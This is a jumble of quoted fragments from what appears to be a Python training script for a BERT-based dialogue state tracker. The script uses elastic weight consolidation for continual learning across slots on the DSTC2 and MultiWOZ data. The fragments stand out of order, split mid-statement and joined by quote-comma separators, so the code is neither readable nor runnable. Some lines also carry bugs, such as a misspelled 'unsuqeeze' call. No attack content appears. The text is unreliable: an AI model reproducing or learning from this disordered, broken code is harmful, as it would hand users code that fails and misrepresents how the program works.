all_padding_len = [0, 0] max_turn", "self.all_slot = self.prev_slot + self.target_slot logger.info('Processor: previous slots: ' + ', '.join(self.prev_slot)) logger.info('Processor:", "total input turn length. \\n\" \"Sequences longer than this will be truncated, and", "a list of `InputBatch`s.\"\"\" slot_dim = len(label_list) prev_slot_dim = len(prev_label_list) def _hard_coding_label(label): return", "or transformer') from BeliefTrackerSlotQueryMultiSlotEWC import EWC model = BeliefTracker(args, num_labels, device) if args.fp16:", "default=0.1, type=float, help=\"Proportion of training to perform linear learning rate warmup for. \"", "eval_loss, eval_accuracy = 0, 0 eval_loss_slot, eval_acc_slot = None, None nb_eval_steps, nb_eval_examples =", "warm up BERT uses lr_this_step = args.learning_rate * warmup_linear(global_step / t_total, args.warmup_proportion) if", "used when fp16 set to True.\\n\" \"0 (default value): dynamic loss scaling.\\n\" \"Positive", "optimizer.zero_grad() global_step += 1 # Perform evaluation on validation dataset model.eval() dev_loss =", "= prev_eval_accuracy / nb_eval_examples_prev eval_acc_slot = eval_acc_slot / nb_eval_examples prev_eval_acc_slot = prev_eval_acc_slot /", "%H:%M:%S', level=logging.INFO) logger = logging.getLogger(__name__) ############################################################################### # Data Preprocessing ############################################################################### class InputExample(object): \"\"\"A", "slot in enumerate(processor.prev_slot): summary_writer.add_scalar(\"Validate/Prev_Loss_%s\" % slot.replace(' ','_'), prev_dev_loss_slot[i]/prev_nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Prev_Acc_%s\" % slot.replace(' ','_'),", "BertTokenizer from pytorch_pretrained_bert.optimization import BertAdam from tensorboardX import SummaryWriter import pdb import matplotlib.pyplot", "import operator from tqdm import tqdm, trange import numpy as np import torch", "set of features of data.\"\"\" def __init__(self, input_ids, input_len, label_id, prev_label_id): self.input_ids =", "in enumerate(processor.target_slot): summary_writer.add_scalar(\"Validate/Loss_%s\" % slot.replace(' ','_'), dev_loss_slot[i]/nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Acc_%s\" % slot.replace(' ','_'), dev_acc_slot[i],", "= np.argmax(out, axis=1) return np.sum(outputs == labels) def warmup_linear(x, warmup=0.002): if x <", "text_a self.text_b = text_b self.label = label # Target slots in this training", "in previous task target_slot_id = list(range(len(processor.prev_slot), len(processor.all_slot))) # list of slots in present", "tokenizer, args.max_turn_length) logger.info(\"***** Running training *****\") logger.info(\" Num examples = %d\", len(train_examples)) logger.info(\"", "model.attn.get_scores().transpose(1, 2).contiguous().view(label_ids.size(1)*nslot, -1, max_len) for slot in range(0, nslot): fig, axs = plt.subplots(nturn,", "tasks class InputFeatures(object): \"\"\"A single set of features of data.\"\"\" def __init__(self, input_ids,", "[] self.target_slot_idx = sorted([ int(x) for x in config.target_slot.split(':')]) self.prev_slot_idx = sorted([ int(x)", "# Run prediction for full data eval_sampler = SequentialSampler(eval_data) eval_dataloader = DataLoader(eval_data, sampler=eval_sampler,", "pred: %s\" % (turn, processor.target_slot[slot], str(label_list[slot][label_ids[0][turn][slot].item()]), str(label_list[slot][pred_slot[0][turn][slot].item()]) )) plt.show() 
plt.savefig(os.path.join(args.output_dir, \"attention-d%d-slot%s.png\"%(len(incorrect_dialogs), slot))) plt.close()", "slot in self.prev_slot] def _create_examples(self, lines, set_type, accumulation=False): \"\"\"Creates examples for the training", "max_turn_length == 0 all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long) all_input_len= torch.tensor([f.input_len", "> 0: torch.cuda.manual_seed_all(args.seed) if not args.do_train and not args.do_eval and not args.do_analyze: raise", "target_slot=target_slot_id) loss = loss.mean() acc = acc.mean() acc_slot = acc_slot.mean(0) prev_loss, prev_loss_slot, prev_acc,", "acc.mean() acc_slot = acc_slot.mean(0) loss_ewc = ewc.penalty(model) loss = loss_ + args.lambda_ewc *", "tokens_b: tokens += tokens_b + [\"[SEP]\"] input_len[1] = len(tokens_b) + 1 input_ids =", "return [ self.ontology[slot] for slot in self.target_slot] def get_prev_labels(self): \"\"\"See base class.\"\"\" return", "slot in range(0, nslot): fig, axs = plt.subplots(nturn, 1, figsize=(50, 10*nturn)) print(\"Slot\", slot)", "sorted([ int(x) for x in config.prev_slot.split(':')]) ontology_items = list(self.ontology.items()) for idx, domain in", "os.path.join(args.output_dir, \"pytorch_model.bin\") if args.do_train: if n_gpu == 1: torch.save(model.state_dict(), output_model_file) else: torch.save(model.module.state_dict(), output_model_file)", "parser.add_argument(\"--output_dir\", default=None, type=str, required=True, help=\"The output directory where the model predictions and checkpoints", "8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(label_ids[0, 0:10, 0:8].cpu() == torch.Tensor(none_value_id[0:8]).long().repeat(10, 1)) print(label_ids[0, 0:10, 18:].cpu()", "input_ids, input_len, label_ids, prev_label_ids = batch if input_ids.dim() == 2: input_ids = input_ids.unsqueeze(0)", "= %d\", len(train_examples)) logger.info(\" Batch size = %d\", args.train_batch_size) logger.info(\" Num steps =", "type=int, default=100, help=\"hidden dimension used in belief tracker\") parser.add_argument('--num_rnn_layers', type=int, default=1, help=\"number of", "and evaluation ptr_model = torch.load(args.load_path, map_location=device) del_list = [] rename_list = [] for", "slot_acc in enumerate(total_slot_class_acc): writer.write(\"%d\\t%.3f\\n\" % (sid, slot_acc)) writer.write(\"total class accuracy \\t%.3f\\n\" % total_class_acc)", "optimizer.step() optimizer.zero_grad() global_step += 1 # Perform evaluation on validation dataset model.eval() dev_loss", "global_step += 1 # Perform evaluation on validation dataset model.eval() dev_loss = 0", "None, None nb_eval_examples_prev = 0 for input_ids, input_len, label_ids, prev_label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"):", "input_len = input_len.unsqueeze(0) label_ids = label_ids.unsuqeeze(0) with torch.no_grad(): _, _, acc, _, pred_slot", "bert-gru-label-embedding, bert-lstm-label-embedding\") parser.add_argument(\"--output_dir\", default=None, type=str, required=True, help=\"The output directory where the model predictions", "* num_valid_turn for l in loss_slot] dev_acc_slot = acc_slot * num_valid_turn prev_dev_loss_slot =", "args.max_seq_length, tokenizer, args.max_turn_length) logger.info(\"***** Running validation *****\") logger.info(\" Num examples = %d\", len(dev_examples))", "% max_turn_length == 0 if prev_dialogue_idx is None or prev_turn_idx < max_turn_length: features.append(InputFeatures(input_ids=input_ids,", "len(label_token_ids) label_padding = [0] * (max_seq_length - 
len(label_token_ids)) label_token_ids += label_padding assert len(label_token_ids)", "in prev_loss_slot] prev_dev_acc_slot = prev_acc_slot * prev_num_valid_turn else: for i, l in enumerate(loss_slot):", "Processor processor = Processor(args) prev_label_list = processor.get_prev_labels() # Slot value labels of Previous", "= all_input_ids.view(-1, max_turn_length, max_seq_length) all_input_len = all_input_len.view(-1, max_turn_length, 2) all_label_ids = all_label_ids.view(-1, max_turn_length,", "xticklabels=x, square=True, yticklabels=y, vmin=0.0, vmax=1.0, cbar=False, ax=ax) class_correct = [[0 for x in", "prev_loss = prev_loss.mean() prev_acc = prev_acc.mean() prev_acc_slot = prev_acc_slot.mean(0) num_valid_turn = torch.sum(label_ids[:,:,0].view(-1) >", "range\" if idx in self.target_slot_idx: self.target_slot.append(slot) elif idx in self.prev_slot_idx: self.prev_slot.append(slot) self.all_slot =", "!= -1).sum().item() nslot = label_ids.size(2) for slot in range(nslot): for turn in range(nturn):", "include at least \\\"gru\\\" or \\\"lstm\\\"\") elif args.nbt =='turn': from BeliefTrackerSlotQueryMultiSlotTurn import BeliefTracker", "* args.num_train_epochs) ## utterances all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features( train_examples, target_label_list, prev_label_list,", "for (i, line) in enumerate(lines): guid = \"%s-%s-%s\" % (set_type, line[0], line[1]) #", "model directory name') parser.add_argument(\"--target_slot\", default='', type=str, required=True, help=\"Target slot idx to train model.", "device = torch.device(\"cuda\", args.local_rank) n_gpu = 1 # Initializes the distributed backend which", "max_length: break if len(tokens_a) > len(tokens_b): tokens_a.pop() else: tokens_b.pop() ############################################################################### # Miscellaneous functions", "accumulation=False): \"\"\"Creates examples for the training and dev sets.\"\"\" prev_dialogue_index = None examples", "0 prev_eval_loss, prev_eval_accuracy = 0, 0 prev_eval_loss_slot, prev_eval_acc_slot = None, None nb_eval_examples_prev =", "prev_loss_slot, prev_acc, prev_acc_slot, nb_eval_ex_prev) eval_loss /= nb_eval_examples if eval_loss_slot is None: # for", "i in range(len(num_labels))] class_count = [[0 for x in range(num_labels[i])] for i in", "== -1: train_sampler = RandomSampler(train_data) else: train_sampler = DistributedSampler(train_data) train_dataloader = DataLoader(train_data, sampler=train_sampler,", "== 1: loss_, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id)", "for n, p in param_optimizer if not any(nd in n for nd in", "x != '#' else '[SEP]' for x in tokenizer.tokenize(example.text_a)] tokens_b = None if", "# Slot value labels of Previous task target_label_list = processor.get_labels() # Slot value", "% (set_type, line[0], line[1]) # line[0]: dialogue index, line[1]: turn index if accumulation:", "dev_acc_slot / nb_dev_examples prev_dev_acc_slot = prev_dev_acc_slot / prev_nb_dev_examples if summary_writer is not None:", "prev_eval_acc_slot / nb_eval_examples_prev total_acc_slot = {} for val, idx in zip(torch.cat([eval_acc_slot, prev_eval_acc_slot]), (target_slot_id+prev_slot_id)):", "return self._create_examples( self._read_tsv(os.path.join(data_dir, \"dev.tsv\")), \"dev\", accumulation) def get_test_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\"", "= [ line[4+idx] for idx in self.prev_slot_idx] examples.append( InputExample(guid=guid, 
text_a=text_a, text_b=text_b, label=label, prev_label=prev_label))", "task # tokenizer vocab_dir = os.path.join(args.bert_dir, '%s-vocab.txt' % args.bert_model) if not os.path.exists(vocab_dir): raise", "+ tokenizer.tokenize(label) + [\"[SEP]\"] label_token_ids = tokenizer.convert_tokens_to_ids(label_tokens) label_len = len(label_token_ids) label_padding = [0]", "in enumerate(lines): guid = \"%s-%s-%s\" % (set_type, line[0], line[1]) # line[0]: dialogue index,", "simple sequence classification.\"\"\" def __init__(self, guid, text_a, text_b=None, label=None, prev_label=None): self.guid = guid", "Validation Loss=%.6f, Validation Acc=%.6f ***\" % (last_update, best_loss, best_acc)) else: logger.info(\"*** Model NOT", "self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"train\", accumulation) def get_dev_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples(", "label_id=label_id, prev_label_id=prev_label_id, )) prev_dialogue_idx = curr_dialogue_idx prev_turn_idx = curr_turn_idx if prev_turn_idx < max_turn_length:", "for f in features], dtype=torch.long) all_prev_label_ids = torch.tensor([f.prev_label_id for f in features], dtype=torch.long)", "slot: %s label: %s pred: %s\" % (turn, processor.target_slot[slot], str(label_list[slot][label_ids[0][turn][slot].item()]), str(label_list[slot][pred_slot[0][turn][slot].item()]) )) plt.show()", "on the test set.\") parser.add_argument(\"--do_lower_case\", action='store_true', help=\"Set this flag if you are using", "tokens_a = tokens_a[:(max_seq_length - 2)] tokens = [\"[CLS]\"] + tokens_a + [\"[SEP]\"] input_len", "be True.\") ############################################################################### # Load data ############################################################################### # Get Processor processor = Processor(args)", "args.bert_model) if not os.path.exists(vocab_dir): raise ValueError(\"Can't find %s \" % vocab_dir) tokenizer =", "= TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids) if args.local_rank == -1: train_sampler = RandomSampler(train_data) else:", "global_step) summary_writer.add_scalar(\"Train/Loss\", loss_, global_step) summary_writer.add_scalar(\"Train/Loss_EWC\", loss_ewc, global_step) summary_writer.add_scalar(\"Train/Loss_Total\", loss, global_step) summary_writer.add_scalar(\"Train/JointAcc\", acc, global_step)", "= 10%% of training.\") parser.add_argument(\"--lambda_ewc\", default=0.1, type=float, help=\"Hyper-parameter for EWC\") parser.add_argument(\"--no_cuda\", action='store_true', help=\"Whether", "for f in features], dtype=torch.long) # reshape tensors to [batch, turn, word] all_input_ids", "acc.item() * num_valid_turn prev_num_valid_turn = torch.sum(prev_label_ids[:,:,0].view(-1) > -1, 0).item() prev_dev_loss += prev_loss.item() *", "set.\") args = parser.parse_args() if os.path.exists(args.output_dir) and os.listdir(args.output_dir) and args.do_train: raise ValueError(\"Output directory", "%d\", 1) eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids) # Run prediction for full data", "dev_acc = 0 dev_loss_slot, dev_acc_slot = None, None nb_dev_examples, nb_dev_steps = 0, 0", "= dev_loss / nb_dev_examples dev_acc = dev_acc / nb_dev_examples prev_dev_loss = prev_dev_loss /", "all_label_ids = all_label_ids.view(-1, max_turn_length, slot_dim) all_prev_label_ids = all_prev_label_ids.view(-1, max_turn_length, prev_slot_dim) return all_input_ids, all_input_len,", "text_a=text_a, text_b=text_b, label=label, 
prev_label=prev_label)) return examples def convert_examples_to_features(examples, label_list, prev_label_list, max_seq_length, tokenizer, max_turn_length):", "to allow no further improvement.\") parser.add_argument(\"--warmup_proportion\", default=0.1, type=float, help=\"Proportion of training to perform", "\"cpu\") n_gpu = torch.cuda.device_count() else: torch.cuda.set_device(args.local_rank) device = torch.device(\"cuda\", args.local_rank) n_gpu = 1", "=='turn': from BeliefTrackerSlotQueryMultiSlotTurn import BeliefTracker elif args.nbt == 'transformer': from BeliefTrackerSlotQueryMultiSlotTransformer import BeliefTracker", "converters for sequence classification data sets.\"\"\" def get_train_examples(self, data_dir): \"\"\"Gets a collection of", "# line[0]: dialogue index, line[1]: turn index if accumulation: if prev_dialogue_index is None", "and fp16 training.\") model = DDP(model) elif n_gpu > 1: model = torch.nn.DataParallel(model)", "for this data set.\"\"\" raise NotImplementedError() @classmethod def _read_tsv(cls, input_file, quotechar=None): \"\"\"Reads a", "global_step = 0 last_update = None best_loss = None #### EWC: calculate Fisher", "config.target_slot.split(':')]) self.prev_slot_idx = sorted([ int(x) for x in config.prev_slot.split(':')]) ontology_items = list(self.ontology.items()) for", "= \"%s-%s-%s\" % (set_type, line[0], line[1]) # line[0]: dialogue index, line[1]: turn index", "logger.info(\"label: \" + label_info) logger.info(\"previous label: \" + prev_label_info) curr_dialogue_idx = example.guid.split('-')[1] curr_turn_idx", "idx in self.prev_slot_idx] examples.append( InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label, prev_label=prev_label)) return examples def convert_examples_to_features(examples,", "of 2: static loss scaling value.\\n\") parser.add_argument(\"--do_not_use_tensorboard\", action='store_true', help=\"Whether to run eval on", "label_token_ids, label_len = [], [] for labels in label_list: token_ids, lens = get_label_embedding(labels,", "param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0, 'lr': args.learning_rate},", "+ args.lambda_ewc * ewc.penalty(model) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids,", "Valid prev acc=%.6f ***\" \\ % (epoch, dev_loss, dev_acc, prev_dev_loss, prev_dev_acc)) dev_loss =", "Model NOT Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***\" % (epoch, dev_loss, dev_acc))", "drawfig == True: #if (len(incorrect_dialogs) < attention_draw): max_len = input_ids.size(2) attn_scores = model.attn.get_scores().transpose(1,", "all_padding_len = [0, 0] max_turn = 0 for (ex_index, example) in enumerate(examples): if", "ontology[\"informable\"] del ontology[\"request\"] for slot in ontology.keys(): ontology[slot].append(\"do not care\") ontology[slot].append(\"none\") fp_ontology.close() elif", "== -1: break text = {} text['input'] = ' '.join(tokenizer.convert_ids_to_tokens(input.cpu().numpy())).replace(' [PAD]', '') text['label']", "ontology[slot].append(\"do not care\") ontology[slot].append(\"none\") fp_ontology.close() elif config.data_dir == \"data/multiwoz\": fp_ontology = open(os.path.join(config.data_dir, \"ontology.json\"),", "slot embeddings are ordered as [previous slots + present target slots] slot_token_ids, slot_len", "= 0 last_update = None best_loss = None #### EWC: calculate Fisher ewc", "batch_size=args.eval_batch_size) model.eval() eval_loss, eval_accuracy = 0, 0 eval_loss_slot, eval_acc_slot = None, None 
nb_eval_steps,", "pdb import matplotlib.pyplot as plt import seaborn seaborn.set_context(context=\"talk\") logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s", "key in sorted(result.keys()): logger.info(\" %s = %s\", key, str(result[key])) writer.write(\"%s = %s\\n\" %", "tokens += tokens_b + [\"[SEP]\"] input_len[1] = len(tokens_b) + 1 input_ids = tokenizer.convert_tokens_to_ids(tokens)", "- prev_turn_idx - 1) assert len(features) % max_turn_length == 0 if prev_dialogue_idx is", "== 'all': slot_idx = {'attraction':'0:1:2', 'bus':'3:4:5:6', 'hospital':'7', 'hotel':'8:9:10:11:12:13:14:15:16:17',\\ 'restaurant':'18:19:20:21:22:23:24', 'taxi':'25:26:27:28', 'train':'29:30:31:32:33:34'} target_slot =[]", "+= 1 if (step + 1) % args.gradient_accumulation_steps == 0: # modify learning", "0 for sid, slot in enumerate(class_count): slot_class_acc = 0 for vid, value in", "= None all_padding = [0] * max_seq_length all_padding_len = [0, 0] max_turn =", "args.fp16: try: from apex.optimizers import FP16_Optimizer from apex.optimizers import FusedAdam except ImportError: raise", "# Load data ############################################################################### # Get Processor processor = Processor(args) prev_label_list = processor.get_prev_labels()", "not value == 0: class_acc = class_correct[sid][vid]/value writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value, class_acc) ) slot_class_acc", "sampler=train_sampler, batch_size=args.train_batch_size) ## Dev ## utterances all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = convert_examples_to_features( dev_examples,", "dev_loss, global_step) summary_writer.add_scalar(\"Validate/Acc\", dev_acc, global_step) summary_writer.add_scalar(\"Validate/Prev_Loss\", prev_dev_loss, global_step) summary_writer.add_scalar(\"Validate/Prev_Acc\", prev_dev_acc, global_step) if n_gpu", "# Data Preprocessing ############################################################################### class InputExample(object): \"\"\"A single training/test example for simple sequence", "def get_test_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"test.tsv\")), \"test\", accumulation)", "\" + prev_label_info) curr_dialogue_idx = example.guid.split('-')[1] curr_turn_idx = int(example.guid.split('-')[2]) if (prev_dialogue_idx is not", "args.fp16)) if args.gradient_accumulation_steps < 1: raise ValueError(\"Invalid gradient_accumulation_steps parameter: {}, should be >=", "all_input_len, all_label_ids, all_prev_label_ids \\ = all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device) train_data = TensorDataset(all_input_ids, all_input_len,", "for epoch in trange(int(args.num_train_epochs), desc=\"Epoch\"): # for epoch in trange(1): #### TRAIN model.train()", "writer.write(\"%s = %s\\n\" % (key, str(result[key]))) ############################################################################### # Analyze: TODO ############################################################################### if args.do_analyze", "axs[turn].set_title(\"turn %d slot: %s label: %s pred: %s\" % (turn, processor.target_slot[slot], str(label_list[slot][label_ids[0][turn][slot].item()]), str(label_list[slot][pred_slot[0][turn][slot].item()])", "Required parameters parser.add_argument('--data_dir', type=str, required=True, help='location of the data corpus') 
parser.add_argument(\"--bert_model\", default=None, type=str,", "2: tokens_a = tokens_a[:(max_seq_length - 2)] tokens = [\"[CLS]\"] + tokens_a + [\"[SEP]\"]", "examples for the training and dev sets.\"\"\" prev_dialogue_index = None examples = []", "user utterance text_b = line[3] # line[3]: system response label = [ line[4+idx]", "logging.getLogger(__name__) ############################################################################### # Data Preprocessing ############################################################################### class InputExample(object): \"\"\"A single training/test example for", "all_input_len= torch.tensor([f.input_len for f in features], dtype=torch.long) all_label_ids = torch.tensor([f.label_id for f in", "= loss / args.gradient_accumulation_steps if args.fp16: optimizer.backward(loss) else: loss.backward() if summary_writer is not", "0 assert len(input_ids) == max_seq_length label_id, label_info = _get_label(example.label, label_list) prev_label_id, prev_label_info =", "key == config.target_slot: target_slot.append(value) else: prev_slot.append(value) config.target_slot = ':'.join(target_slot) config.prev_slot = ':'.join(prev_slot) else:", "parser.add_argument(\"--max_label_length\", default=32, type=int, help=\"The maximum total input sequence length after WordPiece tokenization. \\n\"", "t_total = num_train_steps if args.local_rank != -1: t_total = t_total // torch.distributed.get_world_size() if", "label, pred in zip(input_ids[0], label_ids[0], pred_slot[0]): if label[0] == -1: break text =", "desc=\"Evaluating\"): if input_ids.dim() == 2: input_ids = input_ids.unsqueeze(0) input_len = input_len.unsqueeze(0) label_ids =", "= '' label_map = [{_label: i for i, _label in enumerate(labels)} for labels", "_ = batch if n_gpu == 1: loss_, loss_slot, acc, acc_slot, _ =", "prev_label_ids = prev_label_ids.unsuqeeze(0) with torch.no_grad(): if n_gpu == 1: loss_, loss_slot, acc, acc_slot,", "text += '%s\\t%s\\t'%(label, pred) writer.write(\"%s\\n\" % text) writer.write(\"---------- \\n\") logger.info(\"Done analysis: %s\" %", "all_input_len.to( device), all_label_ids.to(device) logger.info(\"***** Running analysis *****\") logger.info(\" Num examples = %d\", len(eval_examples))", "self.text_b = text_b self.label = label # Target slots in this training task", "n_gpu, target_slot=prev_slot_id) prev_loss = prev_loss.mean() prev_acc = prev_acc.mean() prev_acc_slot = prev_acc_slot.mean(0) nb_eval_ex_prev =", "== 0 all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long) all_input_len= torch.tensor([f.input_len for", "= os.path.join(args.output_dir, \"pytorch_model.bin\") # Load a trained model that you have fine-tuned ptr_model", "del_list.append(key) if ('rnn.' 
in key): # rename rnn -> nbt, rename_list.append(key) for key", "','_'), prev_dev_loss_slot[i]/prev_nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Prev_Acc_%s\" % slot.replace(' ','_'), prev_dev_acc_slot[i], global_step) logger.info(\"*** Model Updated: Epoch=%d,", "cosine, euclidean.\") parser.add_argument(\"--train_batch_size\", default=4, type=int, help=\"Total batch size for training.\") parser.add_argument(\"--dev_batch_size\", default=1, type=int,", "type=float, help=\"Hyper-parameter for EWC\") parser.add_argument(\"--no_cuda\", action='store_true', help=\"Whether not to use CUDA when available\")", "(label, label_map[i][label]) return label_id, label_info features = [] prev_dialogue_idx = None all_padding =", "for distributed training on gpus\") parser.add_argument('--seed', type=int, default=42, help=\"random seed for initialization\") parser.add_argument('--gradient_accumulation_steps',", "* (max_turn_length - prev_turn_idx - 1) assert len(features) % max_turn_length == 0 all_input_ids", "not None: if eval_loss_slot is None: eval_loss_slot = [ l * nb_eval_ex for", "base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"test.tsv\")), \"test\", accumulation) def get_labels(self): \"\"\"See base class.\"\"\"", "performing a backward/update pass.\") parser.add_argument('--fp16', action='store_true', help=\"Whether to use 16-bit float precision instead", "bert-base-multilingual-uncased, \" \"bert-base-multilingual-cased, bert-base-chinese.\") parser.add_argument(\"--bert_dir\", default='/gfs/nlp/.pytorch_pretrained_bert', type=str, required=False, help=\"The directory of the pretrained", "type=str, required=True, help='location of the data corpus') parser.add_argument(\"--bert_model\", default=None, type=str, required=True, help=\"Bert pre-trained", "'\\t'.join([str(val[1].item()) for val in total_acc_slot]) } out_file_name = 'eval_results' if args.target_slot=='all': out_file_name +=", "= open(os.path.join(config.data_dir, \"ontology_dstc2_en.json\"), \"r\") ontology = json.load(fp_ontology) ontology = ontology[\"informable\"] del ontology[\"request\"] for", "acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss_ewc = ewc.penalty(model) loss", "args = parser.parse_args() if os.path.exists(args.output_dir) and os.listdir(args.output_dir) and args.do_train: raise ValueError(\"Output directory ({})", "device) if args.fp16: model.half() # Load pretrained model # in the case that", "logger.info('Processor: target slots: '+ ', '.join(self.target_slot)) def get_train_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\"", "if summary_writer is not None: summary_writer.add_scalar(\"Train/LearningRate\", lr_this_step, global_step) for param_group in optimizer.param_groups: param_group['lr']", "input_ids self.input_len = input_len self.label_id = label_id self.prev_label_id = prev_label_id # trained slots", "= _get_label(example.label, label_list) prev_label_id, prev_label_info = _get_label(example.prev_label, prev_label_list) if ex_index < 5: logger.info(\"***", "= torch.nn.DataParallel(model) if args.do_eval and (args.local_rank == -1 or torch.distributed.get_rank() == 0): eval_examples", "accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"train\", accumulation) def get_dev_examples(self, data_dir,", "***\" % (last_update, best_loss, best_acc)) else: logger.info(\"*** Model NOT Updated: 
Epoch=%d, Validation Loss=%.6f,", "help=\"Loss scaling to improve fp16 numeric stability. Only used when fp16 set to", "= 0, 0 eval_loss_slot, eval_acc_slot = None, None nb_eval_steps, nb_eval_examples = 0, 0", "import pdb import matplotlib.pyplot as plt import seaborn seaborn.set_context(context=\"talk\") logging.basicConfig(format='%(asctime)s - %(levelname)s -", "all_input_len, all_label_ids, all_prev_label_ids def get_label_embedding(labels, max_seq_length, tokenizer, device): features = [] for label", "Load data ############################################################################### # Get Processor processor = Processor(args) prev_label_list = processor.get_prev_labels() #", "previous task target_slot_id = list(range(len(processor.prev_slot), len(processor.all_slot))) # list of slots in present task", "training.\") parser.add_argument(\"--dev_batch_size\", default=1, type=int, help=\"Total batch size for validation.\") parser.add_argument(\"--eval_batch_size\", default=16, type=int, help=\"Total", "ignore comments (starting with '#') continue lines.append(line) return lines class Processor(DataProcessor): \"\"\"Processor for", "= guid self.text_a = text_a self.text_b = text_b self.label = label # Target", "int(args.train_batch_size / args.gradient_accumulation_steps) # Set the random seed manually for reproducibility. random.seed(args.seed) np.random.seed(args.seed)", "= curr_turn_idx if prev_turn_idx < max_turn_length: features += [InputFeatures(input_ids=all_padding, input_len=all_padding_len, label_id=[-1]*slot_dim, prev_label_id=[-1]*prev_slot_dim)] *", "del ontology[\"request\"] for slot in ontology.keys(): ontology[slot].append(\"do not care\") ontology[slot].append(\"none\") fp_ontology.close() elif config.data_dir", "all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device) logger.info(\"***** Running evaluation *****\") logger.info(\" Num examples = %d\", len(eval_examples))", "def main(): parser = argparse.ArgumentParser() ## Required parameters parser.add_argument('--data_dir', type=str, required=True, help='location of", "logger.info(\"*** Example ***\") logger.info(\"guid: %s\" % example.guid) logger.info(\"tokens: %s\" % \" \".join([str(x) for", "= prev_acc_slot.mean(0) nb_eval_ex_prev = (prev_label_ids[:,:,0].view(-1) != -1).sum().item() nb_eval_examples_prev += nb_eval_ex_prev nb_eval_ex = (label_ids[:,:,0].view(-1)", "- len(label_token_ids)) label_token_ids += label_padding assert len(label_token_ids) == max_seq_length features.append((label_token_ids, label_len)) all_label_token_ids =", "max_turn_length): \"\"\"Loads a data file into a list of `InputBatch`s.\"\"\" slot_dim = len(label_list)", "exist_ok=True) task_name = args.task_name.lower() tb_file_name = args.output_dir.split('/')[1] # Tensorboard logging if not args.do_not_use_tensorboard:", "dev_loss = 0 dev_acc = 0 dev_loss_slot, dev_acc_slot = None, None nb_dev_examples, nb_dev_steps", "type=int, default=42, help=\"random seed for initialization\") parser.add_argument('--gradient_accumulation_steps', type=int, default=1, help=\"Number of updates steps", "logger.info(\" Num steps = %d\", num_train_steps) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \\ = all_input_ids.to(device),", "prev_acc.mean() prev_acc_slot = prev_acc_slot.mean(0) nb_eval_ex_prev = (prev_label_ids[:,:,0].view(-1) != -1).sum().item() nb_eval_examples_prev += nb_eval_ex_prev nb_eval_ex", "*****\") logger.info(\" Num examples = %d\", len(eval_examples)) logger.info(\" Batch size = %d\", 1)", 
"\"w\") as writer: for dialog in incorrect_dialogs: for turn in dialog: text =", "global_step) summary_writer.add_scalar(\"Train/JointAcc\", acc, global_step) if n_gpu == 1: for i, slot in enumerate(processor.target_slot):", "use distributed and fp16 training.\") optimizer = FusedAdam(optimizer_grouped_parameters, lr=args.learning_rate, bias_correction=False, max_grad_norm=1.0) if args.loss_scale", "os.path.join(args.output_dir, \"%s.txt\" % out_file_name) with open(output_eval_file, \"w\") as writer: logger.info(\"***** Eval results *****\")", "== -1 or args.no_cuda: device = torch.device(\"cuda\" if torch.cuda.is_available() and not args.no_cuda else", "= [str(label_list[idx][x]) for idx, x in enumerate(pred.cpu().numpy())] dialog.append(text) incorrect_dialogs.append(dialog) output_eval_incorr_file = os.path.join(args.output_dir, \"incorrect_dialog.txt\")", "of rnns zero\") parser.add_argument('--skip_connect', type=str, default=False, help=\"skip-connection\") parser.add_argument('--attn_head', type=int, default=4, help=\"the number of", "type=int, help=\"Total batch size for eval.\") parser.add_argument(\"--learning_rate\", default=5e-5, type=float, help=\"The initial learning rate", "parser.add_argument(\"--do_not_use_tensorboard\", action='store_true', help=\"Whether to run eval on the test set.\") args = parser.parse_args()", "and (args.local_rank == -1 or torch.distributed.get_rank() == 0): eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids,", "slot in enumerate(processor.target_slot): summary_writer.add_scalar(\"Train/Loss_%s\" % slot.replace(' ','_'), loss_slot[i], global_step) summary_writer.add_scalar(\"Train/Acc_%s\" % slot.replace(' ','_'),", "args.num_train_epochs) num_dev_steps = int(len(dev_examples) / args.dev_batch_size * args.num_train_epochs) ## utterances all_input_ids, all_input_len, all_label_ids,", "# \" + text_a text_b = line[3] + \" # \" + text_b", "logger.info(\"guid: %s\" % example.guid) logger.info(\"tokens: %s\" % \" \".join([str(x) for x in tokens]))", "loss, loss_slot, acc, acc_slot, nb_eval_ex) prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot = \\ _post_process(prev_eval_loss, prev_eval_loss_slot,", "-1, 0).item() dev_loss += loss.item() * num_valid_turn dev_acc += acc.item() * num_valid_turn prev_num_valid_turn", "prev_dialogue_index = None examples = [] for (i, line) in enumerate(lines): guid =", 